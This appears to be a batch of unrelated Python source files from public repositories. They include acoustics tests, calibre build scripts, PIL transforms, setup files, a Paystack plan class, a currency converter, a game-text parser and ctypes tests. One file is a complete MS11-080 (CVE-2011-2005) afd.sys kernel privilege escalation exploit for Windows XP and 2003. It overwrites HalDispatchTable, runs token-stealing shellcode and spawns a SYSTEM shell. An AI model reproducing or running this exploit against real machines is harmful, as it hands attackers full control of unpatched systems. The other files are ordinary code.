print('\t\t=>' + str(x) + ' unique timestamps.')
# testing MetaTrendfile.get_dbdata_timestamps_generator()
print('\n\ntesting MetaTrendfile.get_dbdata_timestamps_generator()')
print('**********************************************************')
curr_trf = MetaTrendfile(r'C:\Promos15\proj\Foo', 'NS_MSR01a:H01:AussenTemp:Istwert')
with open(r'd:\foo_Aussentemp.csv', "w") as f:
for tstamp in curr_trf.get_dbdata_timestamps_generator(
start_datetime=datetime.datetime(year=2017, month=2, day=1, hour=0, minute=0, tzinfo=MetaTrendfile._tz),
stop_datetime=datetime.datetime(year=2017, month=2, day=6, hour=0, minute=0, tzinfo=MetaTrendfile._tz)
):
tstamp_str = str(tstamp.tstamp_dt)
timediff_str = str(tstamp.timediff)
f.write(';'.join([tstamp_str, timediff_str]) + '\n')
return 0 # success
if __name__ == '__main__':
status = main()
# disable closing of Notepad++
# sys.exit(status)
| stefanbraun-private/pyVisiToolkit | src/trend/datasource/trendfile.py | Python | gpl-3.0 | 49,022 | 0.023622 |
from acoustics.decibel import *
def test_dbsum():
assert(abs(dbsum([10.0, 10.0]) - 13.0103) < 1e-5)
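# Reference identity these tests assume (a sketch, not the library implementation):
# incoherent level summation is L = 10*log10(sum(10**(L_i/10))), hence
# dbsum([10.0, 10.0]) == 10*log10(10 + 10) ~= 13.0103 dB.
def _reference_dbsum(levels):
    import math
    return 10.0 * math.log10(sum(10.0 ** (level / 10.0) for level in levels))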
def test_dbmean():
assert(dbmean([10.0, 10.0]) == 10.0)
def test_dbadd():
assert(abs(dbadd(10.0, 10.0) - 13.0103) < 1e-5)
def test_dbsub():
assert(abs(dbsub(13.0103, 10.0) - 10.0) < 1e-5)
def test_dbmul():
assert(abs(dbmul(10.0, 2) - 13.0103) < 1e-5)
def test_dbdiv():
assert(abs(dbdiv(13.0103, 2) - 10.0) < 1e-5) | FRidh/python-acoustics | tests/test_decibel.py | Python | bsd-3-clause | 451 | 0.019956 |
#!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import os, shutil, subprocess, glob
from setup import Command, __appname__, __version__
class Stage1(Command):
description = 'Stage 1 of the publish process'
sub_commands = [
'check',
'pot',
'build',
'resources',
'translations',
'iso639',
'gui',
]
class Stage2(Command):
description = 'Stage 2 of the publish process'
sub_commands = ['linux', 'win', 'osx']
def pre_sub_commands(self, opts):
for x in glob.glob(os.path.join(self.d(self.SRC), 'dist', '*')):
os.remove(x)
build = os.path.join(self.d(self.SRC), 'build')
if os.path.exists(build):
shutil.rmtree(build)
class Stage3(Command):
description = 'Stage 3 of the publish process'
sub_commands = ['upload_user_manual', 'upload_demo', 'sdist', 'tag_release']
class Stage4(Command):
description = 'Stage 4 of the publish process'
sub_commands = ['upload_installers']
class Stage5(Command):
description = 'Stage 5 of the publish process'
sub_commands = ['upload_to_server']
def run(self, opts):
subprocess.check_call('rm -rf build/* dist/*', shell=True)
class Publish(Command):
description = 'Publish a new calibre release'
sub_commands = ['stage1', 'stage2', 'stage3', 'stage4', 'stage5', ]
class Manual(Command):
description='''Build the User Manual '''
def run(self, opts):
cwd = os.path.abspath(os.getcwd())
os.chdir(os.path.join(self.SRC, '..', 'manual'))
try:
for d in ('.build', 'cli'):
if os.path.exists(d):
shutil.rmtree(d)
os.makedirs(d)
if not os.path.exists('.build'+os.sep+'html'):
os.makedirs('.build'+os.sep+'html')
os.environ['__appname__'] = __appname__
os.environ['__version__'] = __version__
subprocess.check_call(['sphinx-build', '-b', 'html', '-t', 'online',
'-d', '.build/doctrees', '.', '.build/html'])
subprocess.check_call(['sphinx-build', '-b', 'myepub', '-d',
'.build/doctrees', '.', '.build/epub'])
subprocess.check_call(['sphinx-build', '-b', 'mylatex', '-d',
'.build/doctrees', '.', '.build/latex'])
pwd = os.getcwdu()
os.chdir('.build/latex')
subprocess.check_call(['make', 'all-pdf'], stdout=open(os.devnull,
'wb'))
os.chdir(pwd)
epub_dest = self.j('.build', 'html', 'calibre.epub')
pdf_dest = self.j('.build', 'html', 'calibre.pdf')
shutil.copyfile(self.j('.build', 'epub', 'calibre.epub'), epub_dest)
shutil.copyfile(self.j('.build', 'latex', 'calibre.pdf'), pdf_dest)
subprocess.check_call(['ebook-convert', epub_dest,
epub_dest.rpartition('.')[0] + '.azw3',
'--page-breaks-before=/', '--disable-font-rescaling',
'--chapter=/'])
finally:
os.chdir(cwd)
def clean(self):
path = os.path.join(self.SRC, 'calibre', 'manual', '.build')
if os.path.exists(path):
shutil.rmtree(path)
class TagRelease(Command):
description = 'Tag a new release in bzr'
def run(self, opts):
self.info('Tagging release')
subprocess.check_call(('bzr tag '+__version__).split())
subprocess.check_call('bzr commit --unchanged -m'.split() + ['IGN:Tag release'])
| yeyanchao/calibre | setup/publish.py | Python | gpl-3.0 | 3,819 | 0.008117 |
################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: ryujin@offsec.com - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng ########
################################################################################
from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
c_void_p, c_long, c_char_p)
from ctypes.wintypes import HANDLE, DWORD
import socket, time, os, struct, sys
from optparse import OptionParser
usage = "%prog -O TARGET_OS"
parser = OptionParser(usage=usage)
parser.add_option("-O", "--target-os", type="string",
action="store", dest="target_os",
help="Target OS. Accepted values: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['XP','2K3']:
parser.print_help()
sys.exit()
OS = OS.upper()
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
def findSysBase(drvname=None):
ARRAY_SIZE = 1024
myarray = c_ulong * ARRAY_SIZE
lpImageBase = myarray()
cb = c_int(1024)
lpcbNeeded = c_long()
drivername_size = c_long()
drivername_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
for baseaddy in lpImageBase:
drivername = c_char_p("\x00"*drivername_size.value)
if baseaddy:
Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
drivername_size.value)
if drvname:
if drivername.value.lower() == drvname:
print "[+] Retrieving %s info..." % drvname
print "[+] %s base address: %s" % (drvname, hex(baseaddy))
return baseaddy
else:
if drivername.value.lower().find("krnl") !=-1:
print "[+] Retrieving Kernel info..."
print "[+] Kernel version:", drivername.value
print "[+] Kernel base address: %s" % hex(baseaddy)
return (baseaddy, drivername.value)
return None
print "[>] MS11-080 Privilege Escalation Exploit"
print "[>] Matteo Memelli - ryujin@offsec.com"
print "[>] Release Date 28/11/2011"
WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int
class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]
## Create our deviceiocontrol socket handle
client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
None, 0, 0)
if client == ~0:
raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
try:
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(4455)
addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
## We need to connect to a closed port, socket state must be CONNECTING
connect(client, byref(addr), sizeof(addr))
except:
closesocket(client)
raise
baseadd = c_int(0x1001)
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zerobits = c_int(0)
RegionSize = c_int(0x1000)
written = c_int(0)
## This will trigger the path to AfdRestartJoin
irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42"
"\x00\x00\x00\x00\x44\x44\x44\x44"
"\x01\x00\x00\x00"
"\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
## Allocate space for the input buffer
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
# Copy input buffer to it
kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
startPage = c_int(0x00020000)
kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))
################################# KERNEL INFO ##################################
lpDriver = c_char_p()
lpPath = c_char_p()
lpDrvAddress = c_long()
(krnlbase, kernelver) = findSysBase()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
halbase = findSysBase("hal.dll")
## WinXP SP3
if OS == "XP":
HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3
## Win2k3 SP2
else:
HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3
print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
################################# EXPLOITATION #################################
shellcode_address_dep = 0x0002071e
shellcode_address_nodep = 0x000207b8
padding = "\x90"*2
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable + 0x8
## tokenbkaddr = 0x00020900
if OS == "XP":
_KPROCESS = "\x44"
_TOKEN = "\xc8"
_UPID = "\x84"
_APLINKS = "\x88"
else:
_KPROCESS = "\x38"
_TOKEN = "\xd8"
_UPID = "\x94"
_APLINKS = "\x98"
restore_ptrs = "\x31\xc0" + \
"\xb8" + struct.pack("L", HalpSetSystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x8) + \
"\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x4)
tokenstealing = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x89\x1d\x00\x09\x02\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x10"
restore_token = "\x52" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\x15\x00\x09\x02\x00" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5a" +\
"\xc2\x10"
shellcode = padding + restore_ptrs + tokenstealing
shellcode_size = len(shellcode)
orig_size = shellcode_size
# Write shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
# Write shellcode in userspace *(nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Trigger Pointer Overwrite
print "[*] Triggering AFDJoinLeaf pointer overwrite..."
IOCTL = 0x000120bb # AFDJoinLeaf
inputbuffer = 0x1004
inputbuffer_size = 0x108
outputbuffer_size = 0x0 # Bypass Probe for Write
outputbuffer = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
IoStatusBlock = c_ulong()
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger shellcode
inp = c_ulong()
out = c_ulong()
inp = 0x1337
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
## Spawn a system shell, w00t!
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")
############################## POST EXPLOITATION ###############################
print "[*] Restoring token..."
## Restore the thingie
shellcode = padding + restore_ptrs + restore_token
shellcode_size = len(shellcode)
trail_padding = (orig_size - shellcode_size) * "\x00"
shellcode += trail_padding
shellcode_size += (orig_size - shellcode_size)
## Write restore shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
## Write restore shellcode in userspace (nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Overwrite HalDispatchTable once again
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger restore shellcode
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[+] Restore done! Have a nice day :)"
| SecWiki/windows-kernel-exploits | MS11-080/CVE-2011-2005.py | Python | mit | 12,217 | 0.014161 |
from setuptools import setup
setup(name='powerlab',
version='0.1',
description='Power System Tools',
url='https://github.com/Faggioni/powerlab',
author='Miguel Faggioni',
author_email='miguelfaggioni@gmail.com',
license='MIT',
packages=['powerlab'],
install_requires=[
'numpy',
],
entry_points= {
},
zip_safe=False) | Faggioni/powerlab | setup.py | Python | mit | 405 | 0.004938 |
from setuptools import setup, find_packages # Always prefer setuptools over distutils
from os import path
here = path.abspath(path.dirname(__file__))
setup(
name='dicom2fem',
description='Generation of finite element meshes from DICOM images',
    long_description="Generation of finite element meshes using computed " +
"tomography scans. Segmentation is based on the graph cut algorithm.",
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# http://packaging.python.org/en/latest/tutorial.html#version
version='1.1.13',
url='https://github.com/vlukes/dicom2fem',
author='Vladimir Lukes',
author_email='vlukes@kme.zcu.cz',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering :: Bio-Informatics',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: BSD License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
# 'Programming Language :: Python :: 2',
# 'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
# 'Programming Language :: Python :: 3',
# 'Programming Language :: Python :: 3.2',
# 'Programming Language :: Python :: 3.3',
# 'Programming Language :: Python :: 3.4',
],
# What does your project relate to?
keywords='fem dicom',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['dist', 'docs', 'tests*']),
# List run-time dependencies here. These will be installed by pip when your
# project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/technical.html#install-requires-vs-requirements-files
install_requires=[
# 'numpy', 'imcut'
],
# dependency_links=['https://github.com/mjirik/gco_python'],
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
# package_data={
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages.
# see http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
# entry_points={
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
)
| mjirik/dicom2fem | setup.py | Python | bsd-3-clause | 3,561 | 0.000842 |
#
# The Python Imaging Library.
# $Id$
#
# transform wrappers
#
# History:
# 2002-04-08 fl Created
#
# Copyright (c) 2002 by Secret Labs AB
# Copyright (c) 2002 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from PIL import Image
class Transform(Image.ImageTransformHandler):
def __init__(self, data):
self.data = data
def getdata(self):
return self.method, self.data
def transform(self, size, image, **options):
# can be overridden
method, data = self.getdata()
return image.transform(size, method, data, **options)
class AffineTransform(Transform):
"""
Define an affine image transform.
This function takes a 6-tuple (a, b, c, d, e, f) which contain the first
two rows from an affine transform matrix. For each pixel (x, y) in the
output image, the new value is taken from a position (a x + b y + c,
d x + e y + f) in the input image, rounded to nearest pixel.
This function can be used to scale, translate, rotate, and shear the
original image.
@def AffineTransform(matrix)
@param matrix A 6-tuple (a, b, c, d, e, f) containing the first two rows
from an affine transform matrix.
@see Image#Image.transform
"""
method = Image.AFFINE
class ExtentTransform(Transform):
"""
Define a transform to extract a subregion from an image.
Maps a rectangle (defined by two corners) from the image to a rectangle of
the given size. The resulting image will contain data sampled from between
the corners, such that (x0, y0) in the input image will end up at (0,0) in
the output image, and (x1, y1) at size.
This method can be used to crop, stretch, shrink, or mirror an arbitrary
rectangle in the current image. It is slightly slower than crop, but about
as fast as a corresponding resize operation.
@def ExtentTransform(bbox)
@param bbox A 4-tuple (x0, y0, x1, y1) which specifies two points in the
input image's coordinate system.
@see Image#Image.transform
"""
method = Image.EXTENT
class QuadTransform(Transform):
"""
Define a quad image transform.
Maps a quadrilateral (a region defined by four corners) from the image to a
rectangle of the given size.
@def QuadTransform(xy)
    @param xy An 8-tuple (x0, y0, x1, y1, x2, y2, x3, y3) which contains the
upper left, lower left, lower right, and upper right corner of the
source quadrilateral.
@see Image#Image.transform
"""
method = Image.QUAD
class MeshTransform(Transform):
"""
Define a mesh image transform. A mesh transform consists of one or more
individual quad transforms.
@def MeshTransform(data)
@param data A list of (bbox, quad) tuples.
@see Image#Image.transform
"""
method = Image.MESH
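# Minimal usage sketch (added for illustration, not part of the original module):
# any Transform subclass above can be passed straight to Image.transform().
# The file name below is only an assumption.
def _example_extent_transform(path="example.png"):
    """Resample the upper-left 64x64 corner of *path* into a 128x128 image."""
    im = Image.open(path)
    return im.transform((128, 128), ExtentTransform((0, 0, 64, 64)))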
# End of file
| DanteOnline/free-art | venv/lib/python3.4/site-packages/PIL/ImageTransform.py | Python | gpl-3.0 | 2,878 | 0 |
'''
plans.py
'''
from forex_python.converter import CurrencyCodes
from .base import Base
class Plan(Base):
'''
Plan class for making payment plans
'''
interval = None
name = None
amount = None
plan_code = None
currency = None
id = None
send_sms = True
send_invoices = True
description = None
__interval_values = ('hourly', 'daily', 'weekly', 'monthly', 'annually')
def __init__(self, name, interval, amount, currency='NGN', plan_code=None,
id=None, send_sms=None, send_invoices=None, description=None):
super().__init__()
#Check if currency supplied is valid
if not CurrencyCodes().get_symbol(currency.upper()):
raise ValueError("Invalid currency supplied")
if interval.lower() not in self.__interval_values:
raise ValueError("Interval should be one of 'hourly',"
"'daily', 'weekly', 'monthly','annually'"
)
try:
amount = int(amount)
except ValueError:
raise ValueError("Invalid amount")
else:
self.interval = interval.lower()
self.name = name
self.amount = amount
self.currency = currency
self.plan_code = plan_code
self.id = id
self.send_sms = send_sms
self.send_invoices = send_invoices
self.description = description
def __str__(self):
return "%s plan" % self.name
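# Minimal usage sketch (illustrative only): the amount is assumed to be given in
# the currency's minor unit (e.g. kobo for NGN); nothing is sent to the Paystack
# API here.
def _example_plan():
    return Plan("Monthly Premium", "monthly", 50000, currency="NGN",
                description="Example subscription plan")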
| Chibuzor-IN/python-paystack | python_paystack/objects/plans.py | Python | mit | 1,566 | 0.001916 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "PhotoLoader.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| SerSamgy/PhotoLoader | manage.py | Python | mit | 254 | 0 |
#!/usr/bin/env python
import argparse
import logging
from functools import partial
from domain import date, transaction
# Parse command line arguments
parser = argparse.ArgumentParser(description="Convert currency using MasterCard exchange rates",
epilog='If no date is specified, the most recent date with rates is used.')
parser.add_argument('from_quantity', type=float, help='Quantity of from_currency used in transaction')
parser.add_argument('from_currency', type=str.upper,
help='The currency to convert from, i.e. the transaction currency, e.g. GBP, USD, JPY')
parser.add_argument('to_currency', type=str.upper,
help='The currency to convert to, i.e. the card currency, e.g. GBP, USD, JPY')
parser.add_argument('-d', '--date',
help='Day the exchange was made in format YYYY-MM-DD. Only today and yesterday appear to be supported by MasterCard. Defaults to most recent day with rates.')
parser.add_argument('--log_level', help='Set logging level', default='WARNING',
type=str.upper,
choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG'])
parser.add_argument('-t', '--today', action='store_true',
help='Use today\'s exchange rates. This may error if today\'s rates have not been uploaded')
parser.add_argument('-y', '--yesterday', action='count', default=0,
help='Uses yesterday\'s exchange rates. Repeat to go further back in time')
args = parser.parse_args()
logging.basicConfig(level=logging.getLevelName(args.log_level))
logging.debug(args)
# Figure out which date to use
if args.date is not None: # User-specified date
settle = partial(transaction.settle, exchange_rate_date=date.parse(args.date))
elif args.today: # Today
settle = partial(transaction.settle, exchange_rate_date=date.date_today())
elif args.yesterday > 0: # Yesterday (note that yesterday can be specified multiple times)
settle = partial(transaction.settle, exchange_rate_date=date.date_n_days_ago(args.yesterday))
else: # Use most recent date with published rates, discover date from initial MasterCard call
settle = transaction.settle_latest
# Get card amount from MasterCard
transaction = settle(
transaction_amount=args.from_quantity,
transaction_currency=args.from_currency,
card_currency=args.to_currency,
)
# Output conversion
print(transaction['card_amount'])
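# Example invocation (a sketch; the printed figure depends on the rates
# MasterCard publishes for the chosen date):
#
#   python mastercardConvert.py 100 USD EUR       # most recent published rates
#   python mastercardConvert.py 100 USD EUR -y    # yesterday's rates
#
# The script prints a single number: the card-currency (EUR) amount
# corresponding to a 100 USD transaction.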
| XanderXAJ/mastercardConvert | mastercardConvert.py | Python | gpl-3.0 | 2,462 | 0.004874 |
# DPLib - Asynchronous bot framework for Digital Paint: Paintball 2 servers
# Copyright (C) 2017 Michał Rokita
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
A module for parsing DP data
"""
CHAR_TAB = ['\0', '-', '-', '-', '_', '*', 't', '.', 'N', '-', '\n', '#', '.', '>', '*', '*',
'[', ']', '@', '@', '@', '@', '@', '@', '<', '>', '.', '-', '*', '-', '-', '-',
' ', '!', '\"', '#', '$', '%', '&', '\'', '(', ')', '*', '+', ',', '-', '.', '/',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', ';', '<', '=', '>', '?',
'@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^', '_',
'`', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~', '<',
'(', '=', ')', '^', '!', 'O', 'U', 'I', 'C', 'C', 'R', '#', '?', '>', '*', '*',
'[', ']', '@', '@', '@', '@', '@', '@', '<', '>', '*', 'X', '*', '-', '-', '-',
' ', '!', '\"', '#', '$', '%', '&', '\'', '(', ')', '*', '+', ',', '-', '.', '/',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', ';', '<', '=', '>', '?',
'@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^', '_',
'`', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '{', '|', '}', '~', '<']
def decode_ingame_text(text):
"""
Removes special chars from ingame messages/nicks
:param text: Text to decode
:return: Decoded text
"""
cleaned_text = ""
skip_next = False
for i in text:
char_ascii = ord(i)
# 134-underline, 135-italic, 136-color
if char_ascii == 134 or char_ascii == 135 or char_ascii == 136 or skip_next: # Remove underline, italic symbols
if char_ascii == 136:
skip_next = True
else:
skip_next = False
else:
cleaned_text = cleaned_text + CHAR_TAB[char_ascii]
skip_next = False
return cleaned_text
def render_text(text):
"""
Renders some text with formatting to a DP message.
Replaces {C} with color char (ASCII 136), {U} with underline (ASCII 134) and {I} with italic (ASCII 135)
:param text: Text to render
:type text: str
:return: DP message
:rtype: str
"""
return text.format(C=chr(136), U=chr(134), I=chr(135))
def escape_braces(string):
"""
Escapes braces, use for user-input in :func:`render_text`
:param string: string to escape
:return: escaped string
"""
return string.replace('{', '{{').replace('}', '}}')
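# Usage sketch (illustrative):
#
#   >>> msg = render_text('{C}4Warning: {U}mind the gap')   # chr(136)+'4' = colour, chr(134) = underline
#   >>> decode_ingame_text(msg)
#   'Warning: mind the gap'
#   >>> render_text('From user: ' + escape_braces('{not a format field}'))
#   'From user: {not a format field}'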
| mRokita/DPLib | dplib/parse.py | Python | agpl-3.0 | 3,545 | 0.005079 |
import unittest
from ctypes import *
import _ctypes_test
class SlicesTestCase(unittest.TestCase):
def test_getslice_cint(self):
a = (c_int * 100)(*xrange(1100, 1200))
b = range(1100, 1200)
self.failUnlessEqual(a[0:2], b[0:2])
self.failUnlessEqual(len(a), len(b))
self.failUnlessEqual(a[5:7], b[5:7])
self.failUnlessEqual(a[-1], b[-1])
self.failUnlessEqual(a[:], b[:])
a[0:5] = range(5, 10)
self.failUnlessEqual(a[0:5], range(5, 10))
def test_setslice_cint(self):
a = (c_int * 100)(*xrange(1100, 1200))
b = range(1100, 1200)
a[32:47] = range(32, 47)
self.failUnlessEqual(a[32:47], range(32, 47))
from operator import setslice
# TypeError: int expected instead of str instance
self.assertRaises(TypeError, setslice, a, 0, 5, "abcde")
# TypeError: int expected instead of str instance
self.assertRaises(TypeError, setslice, a, 0, 5, ["a", "b", "c", "d", "e"])
# TypeError: int expected instead of float instance
self.assertRaises(TypeError, setslice, a, 0, 5, [1, 2, 3, 4, 3.14])
# ValueError: Can only assign sequence of same size
self.assertRaises(ValueError, setslice, a, 0, 5, range(32))
def test_char_ptr(self):
s = "abcdefghijklmnopqrstuvwxyz"
dll = CDLL(_ctypes_test.__file__)
dll.my_strdup.restype = POINTER(c_char)
dll.my_free.restype = None
res = dll.my_strdup(s)
self.failUnlessEqual(res[:len(s)], s)
import operator
self.assertRaises(TypeError, operator.setslice,
res, 0, 5, u"abcde")
dll.my_free(res)
dll.my_strdup.restype = POINTER(c_byte)
res = dll.my_strdup(s)
self.failUnlessEqual(res[:len(s)], range(ord("a"), ord("z")+1))
dll.my_free(res)
def test_char_ptr_with_free(self):
dll = CDLL(_ctypes_test.__file__)
s = "abcdefghijklmnopqrstuvwxyz"
class allocated_c_char_p(c_char_p):
pass
dll.my_free.restype = None
def errcheck(result, func, args):
retval = result.value
dll.my_free(result)
return retval
dll.my_strdup.restype = allocated_c_char_p
dll.my_strdup.errcheck = errcheck
try:
res = dll.my_strdup(s)
self.failUnlessEqual(res, s)
finally:
del dll.my_strdup.errcheck
def test_char_array(self):
s = "abcdefghijklmnopqrstuvwxyz\0"
p = (c_char * 27)(*s)
self.failUnlessEqual(p[:], s)
try:
c_wchar
except NameError:
pass
else:
def test_wchar_ptr(self):
s = u"abcdefghijklmnopqrstuvwxyz\0"
dll = CDLL(_ctypes_test.__file__)
dll.my_wcsdup.restype = POINTER(c_wchar)
dll.my_wcsdup.argtypes = POINTER(c_wchar),
dll.my_free.restype = None
res = dll.my_wcsdup(s)
self.failUnlessEqual(res[:len(s)], s)
import operator
self.assertRaises(TypeError, operator.setslice,
res, 0, 5, u"abcde")
dll.my_free(res)
if sizeof(c_wchar) == sizeof(c_short):
dll.my_wcsdup.restype = POINTER(c_short)
elif sizeof(c_wchar) == sizeof(c_int):
dll.my_wcsdup.restype = POINTER(c_int)
elif sizeof(c_wchar) == sizeof(c_long):
dll.my_wcsdup.restype = POINTER(c_long)
else:
return
res = dll.my_wcsdup(s)
self.failUnlessEqual(res[:len(s)-1], range(ord("a"), ord("z")+1))
dll.my_free(res)
################################################################
if __name__ == "__main__":
unittest.main()
